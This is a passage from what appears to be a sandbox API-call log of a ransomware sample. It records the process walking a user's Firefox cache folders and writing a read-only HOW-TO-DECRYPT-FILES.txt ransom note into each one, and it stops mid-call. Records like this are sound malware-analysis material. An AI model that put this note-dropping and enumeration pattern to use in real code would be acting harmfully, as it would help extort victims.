lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\2C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.322] GetLastError () returned 0x12 [0049.322] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.322] SetErrorMode (uMode=0x0) returned 0x1 [0049.322] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\2C\\24B53d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\9\\2c\\24b53d01"), fInfoLevelId=0x0, lpFileInformation=0x1b80fa0 | out: lpFileInformation=0x1b80fa0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x88b2b900, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x88b2b900, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x88b9dd20, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x133d5)) returned 1 [0049.322] GetLastError () returned 0x12 [0049.322] SetErrorMode (uMode=0x0) returned 0x1 [0049.323] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\2C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\9\\2c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.323] GetLastError () returned 0x0 [0049.323] GetFileType (hFile=0x184) returned 0x1 [0049.323] SetErrorMode (uMode=0x0) returned 0x1 [0049.323] GetFileType (hFile=0x184) returned 0x1 [0049.323] WriteFile (in: hFile=0x184, lpBuffer=0x1b9cde8*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1b9cde8*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.324] GetLastError () returned 0x0 [0049.324] CloseHandle (hObject=0x184) returned 1 [0049.324] GetLastError () returned 0x0 [0049.324] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\2C\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.325] GetLastError () returned 0x0 [0049.325] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\49\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.325] GetLastError () returned 0x0 [0049.325] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.325] SetErrorMode (uMode=0x0) returned 0x1 [0049.325] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\49\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.325] GetLastError () returned 0x12 [0049.325] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.325] SetErrorMode (uMode=0x0) returned 0x1 [0049.325] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\49\\38779d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\9\\49\\38779d01"), fInfoLevelId=0x0, lpFileInformation=0x1ba03d8 | out: lpFileInformation=0x1ba03d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce2bd930, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xce2bd930, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xce3ee430, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x1a037)) returned 1 [0049.326] GetLastError () returned 0x12 [0049.326] SetErrorMode (uMode=0x0) returned 0x1 [0049.326] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\49\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\9\\49\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.328] GetLastError () returned 0x0 [0049.328] GetFileType (hFile=0x184) returned 0x1 [0049.328] SetErrorMode (uMode=0x0) returned 0x1 [0049.328] GetFileType (hFile=0x184) returned 0x1 [0049.328] WriteFile (in: hFile=0x184, lpBuffer=0x1bbc220*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1bbc220*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.329] GetLastError () returned 0x0 [0049.329] CloseHandle (hObject=0x184) returned 1 [0049.329] GetLastError () returned 0x0 [0049.329] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\49\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.329] GetLastError () returned 0x0 [0049.329] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\61\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.329] GetLastError () returned 0x0 [0049.329] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.330] SetErrorMode (uMode=0x0) returned 0x1 [0049.330] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\61\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.330] GetLastError () returned 0x12 [0049.330] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.330] SetErrorMode (uMode=0x0) returned 0x1 [0049.330] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\61\\28E95d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\9\\61\\28e95d01"), fInfoLevelId=0x0, lpFileInformation=0x1bbf810 | out: lpFileInformation=0x1bbf810*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x88c82560, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x88c82560, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x88c82560, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xa949)) returned 1 [0049.330] GetLastError () returned 0x12 [0049.330] SetErrorMode (uMode=0x0) returned 0x1 [0049.330] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\61\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\9\\61\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.330] GetLastError () returned 0x0 [0049.330] GetFileType (hFile=0x184) returned 0x1 [0049.331] SetErrorMode (uMode=0x0) returned 0x1 [0049.331] GetFileType (hFile=0x184) returned 0x1 [0049.331] WriteFile (in: hFile=0x184, lpBuffer=0x1bdb278*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1bdb278*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.331] GetLastError () returned 0x0 [0049.332] CloseHandle (hObject=0x184) returned 1 [0049.332] GetLastError () returned 0x0 [0049.332] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\61\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.332] GetLastError () returned 0x0 [0049.332] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\8D\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.332] GetLastError () returned 0x0 [0049.332] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.332] SetErrorMode (uMode=0x0) returned 0x1 [0049.332] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\8D\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.332] GetLastError () returned 0x12 [0049.332] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.332] SetErrorMode (uMode=0x0) returned 0x1 [0049.333] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\8D\\2B984d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\9\\8d\\2b984d01"), fInfoLevelId=0x0, lpFileInformation=0x1bde868 | out: lpFileInformation=0x1bde868*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc4876750, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc4876750, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc49810f0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x1fdaf)) returned 1 [0049.333] GetLastError () returned 0x12 [0049.333] SetErrorMode (uMode=0x0) returned 0x1 [0049.333] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\8D\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\9\\8d\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.333] GetLastError () returned 0x0 [0049.333] GetFileType (hFile=0x184) returned 0x1 [0049.333] SetErrorMode (uMode=0x0) returned 0x1 [0049.333] GetFileType (hFile=0x184) returned 0x1 [0049.333] WriteFile (in: hFile=0x184, lpBuffer=0x1bfa2d0*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1bfa2d0*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.334] GetLastError () returned 0x0 [0049.334] CloseHandle (hObject=0x184) returned 1 [0049.335] GetLastError () returned 0x0 [0049.335] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\8D\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.335] GetLastError () returned 0x0 [0049.335] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\E0\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.338] GetLastError () returned 0x0 [0049.338] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.338] SetErrorMode (uMode=0x0) returned 0x1 [0049.338] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\E0\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.338] GetLastError () returned 0x12 [0049.338] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.338] SetErrorMode (uMode=0x0) returned 0x1 [0049.338] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\E0\\F17B2d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\9\\e0\\f17b2d01"), fInfoLevelId=0x0, lpFileInformation=0x1bfd8c0 | out: lpFileInformation=0x1bfd8c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x728200b0, ftCreationTime.dwHighDateTime=0x1d2da24, ftLastAccessTime.dwLowDateTime=0x728200b0, ftLastAccessTime.dwHighDateTime=0x1d2da24, ftLastWriteTime.dwLowDateTime=0x728200b0, ftLastWriteTime.dwHighDateTime=0x1d2da24, nFileSizeHigh=0x0, nFileSizeLow=0x404f)) returned 1 [0049.339] GetLastError () returned 0x12 [0049.339] SetErrorMode (uMode=0x0) returned 0x1 [0049.339] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\E0\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\9\\e0\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.340] GetLastError () returned 0x0 [0049.340] GetFileType (hFile=0x184) returned 0x1 [0049.340] GetFileType (hFile=0x184) returned 0x1 [0049.340] WriteFile (in: hFile=0x184, lpBuffer=0x1c19328*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1c19328*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.341] GetLastError () returned 0x0 [0049.341] CloseHandle (hObject=0x184) returned 1 [0049.341] GetLastError () returned 0x0 [0049.341] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\9\\E0\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.341] GetLastError () returned 0x0 [0049.341] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\A\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.341] GetLastError () returned 0x0 [0049.341] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.341] SetErrorMode (uMode=0x0) returned 0x1 [0049.341] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\A\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.341] GetLastError () returned 0x12 [0049.342] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.342] SetErrorMode (uMode=0x0) returned 0x1 [0049.342] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\A\\B6\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.343] GetLastError () returned 0x12 [0049.343] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.343] SetErrorMode (uMode=0x0) returned 0x1 [0049.343] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\A\\B6\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.343] GetLastError () returned 0x12 [0049.343] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.343] SetErrorMode (uMode=0x0) returned 0x1 [0049.343] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\A\\B6\\F24D0d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\a\\b6\\f24d0d01"), fInfoLevelId=0x0, lpFileInformation=0x1c1e22c | out: lpFileInformation=0x1c1e22c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc4b4a170, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc4b4a170, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc4b4a170, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x4f18)) returned 1 [0049.343] GetLastError () returned 0x12 [0049.343] SetErrorMode (uMode=0x0) returned 0x1 [0049.344] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\A\\B6\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\a\\b6\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.344] GetLastError () returned 0x0 [0049.344] GetFileType (hFile=0x184) returned 0x1 [0049.344] GetFileType (hFile=0x184) returned 0x1 [0049.344] WriteFile (in: hFile=0x184, lpBuffer=0x1c39c94*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1c39c94*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.345] GetLastError () returned 0x0 [0049.345] CloseHandle (hObject=0x184) returned 1 [0049.346] GetLastError () returned 0x0 [0049.346] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\A\\B6\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.346] GetLastError () returned 0x0 [0049.346] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\A\\CE\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.346] GetLastError () returned 0x0 [0049.346] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.346] SetErrorMode (uMode=0x0) returned 0x1 [0049.347] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\A\\CE\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.347] GetLastError () returned 0x12 [0049.347] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.347] SetErrorMode (uMode=0x0) returned 0x1 [0049.347] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\A\\CE\\65483d01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\a\\ce\\65483d01"), fInfoLevelId=0x0, lpFileInformation=0x1c3d284 | out: lpFileInformation=0x1c3d284*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce2bd930, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xce2bd930, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xce3ee430, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x2322f)) returned 1 [0049.347] GetLastError () returned 0x12 [0049.347] SetErrorMode (uMode=0x0) returned 0x1 [0049.347] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\A\\CE\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\a\\ce\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.347] GetLastError () returned 0x0 [0049.347] GetFileType (hFile=0x184) returned 0x1 [0049.347] GetFileType (hFile=0x184) returned 0x1 [0049.348] WriteFile (in: hFile=0x184, lpBuffer=0x1c591d8*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1c591d8*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.348] GetLastError () returned 0x0 [0049.348] CloseHandle (hObject=0x184) returned 1 [0049.349] GetLastError () returned 0x0 [0049.349] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\A\\CE\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.349] GetLastError () returned 0x0 [0049.349] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\B\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.349] GetLastError () returned 0x0 [0049.349] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.349] SetErrorMode (uMode=0x0) returned 0x1 [0049.349] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\B\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.349] GetLastError () returned 0x12 [0049.349] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.350] SetErrorMode (uMode=0x0) returned 0x1 [0049.350] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\B\\2C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.350] GetLastError () returned 0x12 [0049.350] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.350] SetErrorMode (uMode=0x0) returned 0x1 [0049.350] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\B\\2C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.350] GetLastError () returned 0x12 [0049.350] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.351] SetErrorMode (uMode=0x0) returned 0x1 [0049.351] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\B\\2C\\E7C8Fd01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\b\\2c\\e7c8fd01"), fInfoLevelId=0x0, lpFileInformation=0x1c5e1e8 | out: lpFileInformation=0x1c5e1e8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x893cc8c0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x893cc8c0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x89595940, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x78b37)) returned 1 [0049.351] GetLastError () returned 0x12 [0049.351] SetErrorMode (uMode=0x0) returned 0x1 [0049.351] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\B\\2C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\b\\2c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.351] GetLastError () returned 0x0 [0049.351] GetFileType (hFile=0x184) returned 0x1 [0049.351] GetFileType (hFile=0x184) returned 0x1 [0049.351] WriteFile (in: hFile=0x184, lpBuffer=0x1c7a13c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1c7a13c*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.352] GetLastError () returned 0x0 [0049.352] CloseHandle (hObject=0x184) returned 1 [0049.353] GetLastError () returned 0x0 [0049.353] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\B\\2C\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.353] GetLastError () returned 0x0 [0049.353] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\B\\64\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.354] GetLastError () returned 0x0 [0049.354] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.354] SetErrorMode (uMode=0x0) returned 0x1 [0049.354] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\B\\64\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.354] GetLastError () returned 0x12 [0049.354] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.354] SetErrorMode (uMode=0x0) returned 0x1 [0049.355] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\B\\64\\37ABBd01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\b\\64\\37abbd01"), fInfoLevelId=0x0, lpFileInformation=0x1c7d72c | out: lpFileInformation=0x1c7d72c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce309bf0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xce309bf0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xce3ee430, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x1b117)) returned 1 [0049.355] GetLastError () returned 0x12 [0049.355] SetErrorMode (uMode=0x0) returned 0x1 [0049.355] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\B\\64\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\b\\64\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.356] GetLastError () returned 0x0 [0049.356] GetFileType (hFile=0x184) returned 0x1 [0049.356] GetFileType 